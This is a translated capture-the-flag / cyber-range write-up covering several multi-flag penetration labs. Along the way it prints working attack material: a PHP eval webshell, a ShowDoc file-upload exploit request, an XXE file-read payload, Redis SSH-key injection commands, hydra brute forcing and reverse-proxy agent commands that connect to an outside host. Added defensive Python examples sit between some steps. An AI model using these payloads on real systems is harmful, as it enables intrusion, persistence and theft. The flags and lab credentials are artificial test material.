flag3 flag{ad02dc4b5909f67035aeed3073c80e40}
flag5 flag{a62eac23951be937fd7b18289aca7d82}

flag6

This machine has no ifconfig command; use ip a to get the network information.

Found 192.168.1.2

靶场/image-20241213102622914

Then download fscan and venom with wget

Scan the intranet

```bash
./fscan -h 192.168.1.2/24 -nobr
```

There is a git repository

```text
(icmp) Target 192.168.1.2     is alive
(icmp) Target 192.168.1.1 is alive
(icmp) Target 192.168.1.3 is alive
[*] Icmp alive hosts len is: 3
192.168.1.3:80 open
192.168.1.1:80 open
192.168.1.2:80 open
192.168.1.1:22 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://192.168.1.2 code:200 len:4789 title:Bugku后台管理系统
[*] WebTitle http://192.168.1.1 code:200 len:3392 title:Harry's Blog
[*] WebTitle http://192.168.1.3 code:200 len:524 title:乙公司Git仓库
```

On the log4j machine: ./agent_linux_x64 -lport 9899

靶场/image-20241213104925740

Access successful

靶场/image-20241213105121554

Submitting https://github.com/BWVS.git gives

靶场/image-20241213105226317

flag{c516f7dca004dfbb003d27804e90bf23}

flag7

A reasonable guess is that the service will git clone whatever URL we submit, so putting a webshell in the repository gets us a shell.

I used a ready-made repository by someone else: https://github.com/TheBeastofwar/webshell-repository.git

The php extension is not executed, so a webshell with the phtml extension is needed

靶场/image-20241213105614497

The flag is in the root directory

靶场/image-20241213105729321

flag{129ead5fcaac8eeffef8dfccf47a86c5}

A note on how to build this kind of git repository

flag8&flag9

靶场/image-20241213105813430

Found 10.10.0.2; again scan the intranet and set up the proxy.

Summary (whether each hop is forward or reverse depends on the target environment; try different approaches):

Layer 1:

Host: ./admin_linux_x64 -lport 9999

Target 1: ./agent_linux_x64 -rhost 156.238.233.55 -rport 9999

Layer 2:

log4j: ./agent_linux_x64 -lport 9899

Host, node1: connect 192.168.0.3 9899

Layer 3:

git: ./agent_linux_x64 -lport 9899

Host, node2: connect 192.168.1.3 9899

```bash
./fscan -h 10.10.0.2/24
```

```text
10.10.0.2:80 open
10.10.0.1:80 open
10.10.0.1:22 open
10.10.0.3:21 open
[*] WebTitle http://10.10.0.2 code:200 len:524 title:乙公司Git仓库
[*] WebTitle http://10.10.0.1 code:200 len:3368 title:Harry's Blog
```

Found 10.10.0.3:21; combined with the challenge hint, the guess is that we need to log in to FTP.

靶场/image-20241213112029314

Proxy set up

靶场/image-20241213112207123

At this point, in theory only the last entry is needed, but the connection kept failing, probably because so many proxy layers make the network unstable, so I added a few more chain entries and the connection became more stable.

```text
socks5 156.238.233.55 9998
socks5 156.238.233.55 9997
socks5 156.238.233.55 9996
```

Remember to rm flag here, otherwise fetching the flag twice in a row overwrites it.

靶场/image-20241213113107822

靶场/image-20241213113128582

靶场/image-20241213113049460

flag8 flag{a16f408623b7697092666dfea2b63104}

flag9 flag{49aff4e872c264c58ca159408cdabfa2}

Penetration Test 3

flag1

Start with an fscan scan; nothing useful came back.

```text
106.15.187.78:22 open
106.15.187.78:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://106.15.187.78 code:200 len:1987 title:站长之家 - 模拟蜘蛛爬取
```

The web service is a crawler

靶场/image-20241220192319827

It looked like other URL schemes could be abused through it; trying confirmed that they can

靶场/image-20241220192401483

flag1 flag{f6cb56fe46911099f9fcc13f49b3c7e4}

flag2&flag3

靶场/image-20241220192536705

Following the hint, scan directories for a leftover webshell.

Nothing was found.

Use the SSRF found at the start to probe the intranet, choosing 192.168.0.x or 192.168.1.x based on experience from the first two ranges.

1, 2, 10, 138 and 250 return results. 1 and 2 are this service, 10 is the compromised site, 138 is a SQL query page and 250 is a login

靶场/image-20241220195118166

靶场/image-20241220195330494

web directory

flag2 flag{2b247b5edeb35536c5694d92e189fcc5}

root directory

flag3 flag{b2a6e32a57e77efc70f80f7699c6f64d}

flag4

Use this host to download venom and set up the socks proxy

SQL injection (192.168.0.138)

No WAF, and the SQL statement is displayed, so a simple injection is enough.

靶场/image-20241220201636845

flag8&flag7

XXE (192.168.0.250)

Tried logging in with admin/admin; it reports success but nothing changes

Capturing the request shows this form, which very likely means XXE

靶场/image-20241220202139263

Indeed, this reads the final flag

```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY fffffilm SYSTEM "file:///flag">
]>

<user><username>&fffffilm;</username><password>456789</password></user>
```

靶场/image-20241220202318124
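The login endpoint above resolves whatever entities the client's DOCTYPE declares, which is exactly what lets `&fffffilm;` read /flag. The Python example below is added here and is not code from the original writeup: it is a parser for that `<user>` body that refuses any entity declaration before the reference could ever be expanded, using the standard-library expat parser. The document shape and field names come from the request above; the benign sample is constructed.

```python
import xml.parsers.expat


class UnsafeXml(ValueError):
    """Raised when client XML declares entities, the precondition for XXE."""


# Constructed sample in the shape of the request above: the external entity replaces the username.
XXE_DOC = (
    '<?xml version="1.0" encoding="utf-8"?>\n'
    "<!DOCTYPE note [\n"
    '<!ENTITY fffffilm SYSTEM "file:///flag">\n'
    "]>\n"
    "<user><username>&fffffilm;</username><password>456789</password></user>"
)
# Constructed benign login body.
BENIGN_DOC = "<user><username>alice</username><password>hunter2</password></user>"


def parse_login_xml(doc):
    """Return {'username': ..., 'password': ...}; raise UnsafeXml on any entity declaration."""
    parser = xml.parsers.expat.ParserCreate()
    fields = {}
    text = []

    def entity_decl(name, *_):
        # Fires for every <!ENTITY ...> in the internal DTD subset, internal or external,
        # before the body is parsed, so the reference is never expanded.
        raise UnsafeXml(f"entity declaration '{name}' rejected")

    def external_entity_ref(*_):
        return 0  # belt and braces: refusing makes expat stop instead of fetching anything

    def start(name, attrs):
        text.clear()

    def chars(data):
        text.append(data)

    def end(name):
        if name in ("username", "password"):
            fields[name] = "".join(text)

    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(doc, True)
    return fields


def parse_or_reject(doc):
    """Convenience wrapper for request handlers: parsed fields, or None when the body is rejected."""
    try:
        return parse_login_xml(doc)
    except UnsafeXml:
        return None


if __name__ == "__main__":
    print(parse_or_reject(BENIGN_DOC))
    print(parse_or_reject(XXE_DOC))
```

Frameworks expose the same control differently (disabling DTDs on the parser factory in Java, never passing LIBXML_NOENT to DOMDocument::loadXML or simplexml_load_string in PHP), but the invariant is the one shown: client-supplied XML gets no entity declarations at all.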

flag8 flag{f15da3eac1f89447b967283101387482}

web directory

flag7 flag{e7d1512619677a88dfb12f5ea0710893}

flag5&flag6

192.168.0.10 has a second network interface

靶场/image-20241220203246139

But ping cannot be executed there, so fscan cannot scan.

Use PHP to probe for web services (the entry SSRF could probably be used here too, but I did not try it).

```php
<?php
function checkWebService($ip, $port = 80, $timeout = 1) {
    $connection = @fsockopen($ip, $port, $errno, $errstr, $timeout);
    if ($connection) {
        fclose($connection);
        return true; // service open
    }
    return false; // service closed
}

$network = "10.10.0."; // IP range
$outputFile = "web_service_results.txt"; // output file
$openWebServices = []; // IPs with an open web service

// open the file for writing results
$fileHandle = fopen($outputFile, "w");
if (!$fileHandle) {
    die("无法打开文件:$outputFile\n");
}

// iterate over the IP range
for ($i = 1; $i <= 254; $i++) { // 10.10.0.1 through 10.10.0.254
    $ip = $network . $i;
    if (checkWebService($ip, 80)) {
        $result = "HTTP 服务在 $ip:80 开放\n";
        fwrite($fileHandle, $result);
        $openWebServices[] = "$ip:80";
        echo $result;
    }
    if (checkWebService($ip, 443)) {
        $result = "HTTPS 服务在 $ip:443 开放\n";
        fwrite($fileHandle, $result);
        $openWebServices[] = "$ip:443";
        echo $result;
    }
}

// close the file
fclose($fileHandle);

echo "检测完成,结果已保存到 $outputFile\n";
?>
```

靶场/image-20241220210617403

It is a CMS

http://10.10.0.22/admin.php has a backend login

靶场/image-20241220203736716

Log in with admin/admin and upload a backdoor through the admin panel

靶场/image-20241220203825682

靶场/image-20241220204910632

web directory

flag5 flag{c1f0c6b31d9e7816da94740b68139e5c}

root directory

flag6 flag{feeac322e1fe6a6fdf5bd3a1a5ee78fe}

Penetration Test 4

flag1

The entry point is a login page; brute force got nowhere. Modifying the HTTP request, however, revealed something interesting

靶场/image-20241221153330770

The action parameter here is called as a function name; that is the point used for RCE.

靶场/image-20241221153425049

flag1 flag{4851c94c8429295113a13573ca2ef525}

flag2

Write a webshell

```bash
echo -n "<?php eval(\$_POST[a]);phpinfo();?>" > qq.php
```

Check hosts

靶场/image-20241221154105613

Got the local IP, then scanned the intranet; there is no permission to ping, so use the -np parameter

靶场/image-20241221154318136

Found two intranet hosts, one web service and one SSH, plus a separate Redis. (The SSH seemed a bit off; I did not look into it, I had something else to do.)

254 is also this ops login system, so 254 and 100 are probably the same host

So hit Redis first

```bash
proxychains hydra -P passwd-top22000.txt -e ns -f -V redis://192.168.0.202
```

Brute force gives the weak password 123456

靶场/image-20241221160139559

Then write the public key

```bash
ssh-keygen -t rsa # by default the key pair is generated under the user's ~/.ssh directory

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt  # write the public key into a txt file

cat /root/.ssh/1.txt | proxychains redis-cli -h 192.168.0.202 -p 6379 -a 123456 -x set crack

proxychains redis-cli -h 192.168.0.202 -p 6379 -a 123456

config set dir /root/.ssh      # set the directory the key will be stored in

config set dbfilename authorized_keys  # set the file name

get crack # check the cached value

save # write the cache to that path and file on the target

exit  # quit
```

靶场/image-20241221160724486

After this we can connect over SSH.

A full port scan gives port 22000 (I do not quite understand this step; what was used to probe it?)

Then proxychains ssh -i id_rsa -p 22000 root@192.168.0.202

Found the flag, and Note.md contains a password: Dev@Bug_C00l123

flag2 flag{e25a33e49410c55fb49d27ed2d336d45}

靶场/image-20241221160857446

靶场/image-20241221160845155
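What made the key write in this section possible was a Redis reachable from another host, with a guessable password and CONFIG still available to repoint dir and dbfilename. The Python audit below is an added example, not part of the original writeup: it parses a redis.conf text and reports those weaknesses, with a constructed weak configuration (using the password cracked above) beside a hardened one. REPLACE_WITH_LONG_RANDOM_SECRET in the hardened sample is a placeholder, and the 16-character threshold is an assumption of this check.

```python
from collections import defaultdict

# Constructed sample: the kind of configuration that lets the attack in this section work.
WEAK_CONF = """\
port 6379
bind 0.0.0.0
protected-mode no
requirepass 123456
dir /var/lib/redis
"""

# Constructed hardened counterpart. REPLACE_WITH_LONG_RANDOM_SECRET is a placeholder.
HARDENED_CONF = """\
port 6379
bind 127.0.0.1
protected-mode yes
requirepass REPLACE_WITH_LONG_RANDOM_SECRET
dir /var/lib/redis
# take CONFIG/SAVE/BGSAVE away from network clients so dir and dbfilename cannot be repointed
rename-command CONFIG ""
rename-command SAVE ""
rename-command BGSAVE ""
"""

WILDCARD_BINDS = {"0.0.0.0", "*", "::", "::*"}
# Commands that together turn a Redis login into an arbitrary file write.
ABUSABLE_COMMANDS = ("CONFIG", "SAVE", "BGSAVE")


def parse_redis_conf(text):
    """Map lowercase directive -> list of argument strings, ignoring comments and blank lines."""
    directives = defaultdict(list)
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        directives[parts[0].lower()].append(parts[1] if len(parts) > 1 else "")
    return directives


def audit_redis_conf(text):
    """Return human-readable findings; an empty list means none of the checked weaknesses is present."""
    conf = parse_redis_conf(text)
    findings = []

    # A leading '-' marks an optional address in newer Redis; strip it before comparing.
    binds = [b.lstrip("-") for v in conf.get("bind", []) for b in v.split()]
    if not binds or any(b in WILDCARD_BINDS for b in binds):
        findings.append("bind: listens on all interfaces (unset or wildcard)")

    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode: disabled")

    password = conf.get("requirepass", [""])[-1].strip('"')
    if not password:
        findings.append("requirepass: not set, unauthenticated access")
    elif len(password) < 16:
        findings.append("requirepass: shorter than 16 characters, brute-forceable")

    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    for cmd in ABUSABLE_COMMANDS:
        if cmd not in renamed:
            findings.append(f"rename-command: {cmd} still reachable by clients")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(conf) or "no findings")
```

On Redis 6 and later the same effect can also be reached with ACL rules that deny the @dangerous category to application users; either way the goal is that a client who knows the password still cannot choose where the dump file lands.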

flag3

Scanning shows 192.168.0.100 also has port 22000; the password just found logs in successfully

靶场/image-20241221162112040

flag3 flag{ed305e160a430a212b0b5aeceac0cc07}

flag4

hosts reveals another intranet

172.16.0.233

靶场/image-20241221160952257

```text
root@f62750ccae86:~# ./fscan -h 172.16.0.233/24

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.16.0.233 is alive
(icmp) Target 172.16.0.1 is alive
(icmp) Target 172.16.0.153 is alive
[*] Icmp alive hosts len is: 3
172.16.0.233:6379 open
172.16.0.153:80 open
172.16.0.1:22 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://172.16.0.153 code:302 len:0 title:None 跳转url: http://172.16.0.153/web/#/
[*] WebTitle http://172.16.0.153/web/#/ code:200 len:1739 title:ShowDoc
```

There is another web service in this intranet; set up a second-layer proxy

Use the ShowDoc Nday

```http
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: 10.9.47.6:14881
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
Content-Length: 267

----------------------------921378126371623762173617
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain

<?php echo 'hello!!!';@eval($_POST[999])?>
----------------------------921378126371623762173617--
```

Success

靶场/image-20241221163624102

靶场/image-20241221163614588

Connect with AntSword

靶场/image-20241221163935850

flag4 flag{dd3fc7689c269e93790c276407011f56}

flag5

Download showdoc.db.php from the sqlite directory and open it with Navicat

The account and password hash are in the user table

靶场/image-20241221164404852

devteam/f2ef774f5af471562035a1847f307afc

The hash could not be cracked, but the token can be used to log in instead

靶场/image-20241221164632517

cookie_token=9fc900c519fee817ae931572950ddefb397256c7f4ab83a1381cad5a801a17fc

Adding this to the cookie forges a logged-in session.

靶场/image-20241221165245283

The articles can now be viewed

靶场/image-20241221165258372

root:Test@1234. So the password is Test@1234. Whose password is it? Scan all ports of 172.16.0.153

靶场/image-20241221165606703

Port 22000 is the SSH port we will use next.

靶场/image-20241221165445940

flag5 flag{1b825117a12ccc771f13f372361d695e}